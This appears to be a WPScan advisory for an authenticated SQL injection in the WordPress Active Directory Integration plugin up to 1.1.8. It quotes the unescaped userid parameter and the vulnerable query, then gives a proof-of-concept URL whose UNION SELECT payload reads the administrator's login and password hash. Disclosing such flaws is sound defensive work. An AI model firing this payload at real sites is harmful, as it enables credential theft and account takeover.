Active Directory Integration <= 1.1.8 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
Type user acces: administrator user.
Target need have configured ldap and active.

Path Request: /wp-content/plugins/active-directory-integration/syncback.php

Line :  135
$result = $ADI->bulksyncback( $_GET['userid'] );


$_GET[‘userid’] is not escaped.


Path Method: /wp-content/plugins/active-directory-integration/BulkSyncBackADIntegrationPlugin.class.php

Line: 142
$wpdb->get_results("SELECT user_id FROM $wpdb->usermeta WHERE meta_key = 'adi_samaccountname' AND meta_value <> '' AND user_id <> 1 AND user_id = $userid");
Proof of Concept
target.dev/wp-content/plugins/active-directory-integration/syncback.php?userid=1+UNION+SELECT+CONCAT(user_login,char(58),user_pass)+FROM+wp_users+WHERE+ID=1

Affects Plugin

References

URL http://lenonleite.com.br/en/blog/2017/09/11/english-active-directory-integration-wordpress-plugin-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 103
Verified No
WPVDB ID 8952

Timeline

Publicly Published 2017-11-03 (22 days ago)
Added 2017-11-12 (12 days ago)
Last Updated 2017-11-12 (12 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.